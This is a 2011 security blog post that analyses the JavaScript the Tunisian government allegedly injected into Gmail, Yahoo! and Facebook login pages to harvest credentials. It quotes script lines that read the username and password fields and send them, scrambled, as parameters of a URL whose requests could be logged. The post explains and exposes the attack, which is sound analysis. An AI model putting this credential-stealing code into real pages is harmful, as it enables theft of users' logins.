January 25, 2011

It’s only January and we’ve just witnessed a first:  cyber insecurity bringing down a government.  The government of Tunisia, a Wikileak’s target, has been under severe scrutiny for corruption ever since Wikileaks exposed some dodgy practices.

The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” where usernames and passwords were harvested, presumably, by the government to monitor and/or manipulate citizen communications.  Facebook, Gmail and Yahoo! were affected.

Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by Tunisian government:

Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf

Sorry, but this entry is about to get quite geeky.   But for those of you who enjoy the anatomy of a hack, this is quite interesting.  If you’re not a geek, basically these are pictures of a hacker’s hand in the cookie jar.

Hand-cookie-jar

The method is the same in all pages – adding the credential stealing hAAAQ3d() javascript function to the usual form post.

Compare the original Gmail form submission:

NormalGoogle

With the injected one (note the highlight):
InjectedGoogle
Here's the actual hAAAQ3d script:

  Harvestscript

 
The hAAAQ3d script grabs the username and password:

  • The username is stored in the us3r (= user) variable.  var us3r = frm.Email.value;
  • The password is stored in the pa55 (= pass) variable.  var pa55 = frm.Passwd.value;

The attack script then sends the credentials (after being scrambled with h6h function) to the nonexistent URL " http://www.google.com/wo0dh3ad" (= woodhead) as parameters:  

var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

Since the Tunisian government controls all internet transactions they could log all transactions to this link, it can easily obtain the credentials.  

 

 

Share:
Share on LinkedIn

Posted by Imperva Blogger at 02:54:52 PM


Tags:

Comments

Verify your Comment

Previewing your Comment

This is only a preview. Your comment has not yet been posted.

Working...
Your comment could not be posted. Error type:
Your comment has been saved. Comments are moderated and will not appear until approved by the author. Post another comment

The letters and numbers you entered did not match the image. Please try again.

As a final step before posting your comment, enter the letters and numbers you see in the image below. This prevents automated programs from posting comments.

Having trouble reading this image? View an alternate.

Working...

Post a comment

Comments are moderated, and will not appear until the author has approved them.